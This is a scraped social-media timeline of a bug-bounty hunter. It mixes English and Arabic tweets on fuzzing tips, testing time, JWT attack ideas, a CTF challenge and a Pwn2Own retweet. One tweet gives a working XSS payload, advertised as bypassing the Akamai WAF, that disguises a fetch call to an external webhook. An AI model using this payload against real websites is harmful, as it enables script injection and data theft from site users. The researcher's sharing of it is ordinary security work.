Programmer, bug hunter and security researcher
Joined September 2012
- Tweets 5,570
- Following 217
- Followers 15,094
- Likes 4,567
823 Photos and videos
Jun 1
I feel boring lonely 🥱
If u are pro and look for collab
Please let me know
1
1
24
2,073
HitmanAlharbi retweeted
Aaaand it's official! Orange Tsai (@orange_8361) of DEVCORE Research Team chained 3 bugs to achieve Remote Code Execution as SYSTEM on Microsoft Exchange, earning a whooping $200,000 and 20 Master of Pwn points. Full win! #Pwn2Own #P2OBerlin
29
183
1,548
268,990
May 4
When the company team knows what they’re doing and treats people fairly ❤️
4
3
111
7,305
Apr 1
من الناس المبدعين في البق هنتينق 👍🏻❤️
1
7
78
12,361
Mar 13
How long should you test a target?
Many bugs hunters test for a few hours and move on
But some bugs only appear after spending real time on the target
I’ve found issues in a week, and others in months ⏱️
The more time you spend, the better you understand the target
12
1,515
Mar 9
⚡️ Fuzzing tip
Don’t rely only on tools like wfuzz when fuzzing URLs
- Use Burp Suite or similar tools
Sometimes you’ll get 404, but the reaponse headers can reveal the endpoint actually exists and just needs additional headers or parameters
#bugbountytips
1
2
74
4,122
Feb 22
Hint: Treat this CTF as a real-world target!
(BTW there is an automated bot simulates the administrator’s behavior)
1
8
2,521
Feb 22
Psycho CTF challenge 😵💫
Real attack I already faced in real world
ctfing.net:3000
Enjoy ❤️
3
3
17
4,361
Jan 21
XSS using fetch (Bypass Akamai WAF)
javascript:for(k in self)if(k.length==5&&/fetc/.test(k))for(f in self)if(f==k)self[f]`https://webhook`
#bugbounty #bugbountytips
5
46
3,922
22 Dec 2025
اي احد يسوي موقع بالـ AI ياليت لا يتفلسف ويقول برمجت موقع لانك فعليا ماسويت اي شيء ، مو طبيعي كمية التغريدات كل واحد مسوي موقع ويهايط فيه وكلهم نفس التصميم حق جي بي تي ، ماني ضد الذكاء الاصطناعي بس برضوا ماني مع الاعتماد عليه كليا لانه بيحرمك فرصة التعليم
1
3
19
4,329
4 Dec 2025
New React CVE is a trash
Don’t make it sound like it affects all React apps!
5
2,139
28 Nov 2025
خلاص عرفت
28 Nov 2025
كيف اخلي الهيدر يطلع برا الهيدر؟
3
1
16
16,402
17 Nov 2025
كفاية Weak JWT secret ✋🏻
اشوفها فعليا شبه منتهية حاليا
اغلب المنصات تنشأ راندوم كي مايتخمن
- ركزوا على هجمات algorithm conversion
- او حاولوا تشوفوا الموقع كيف يتحقق من السيقنتشر ، ترا كثير مواقع لاحظت انه بعض الاندبوينتس ماتتحقق من السيقنتشر ، وهذا يصير بسبب تعدد المبرمجين عندهم
2
5
53
6,773
HitmanAlharbi retweeted
11 Nov 2025
In our war against the Night, every battle left a scar.
These wounds were given will. A foul life, born of cast-away souls.
Steel your resolve, Nightfarers. This hunt must be seen to its end.
#ELDENRING #NIGHTREIGN The Forsaken Hollows launches on December 4, 2025.
622
7,341
29,821
4,147,714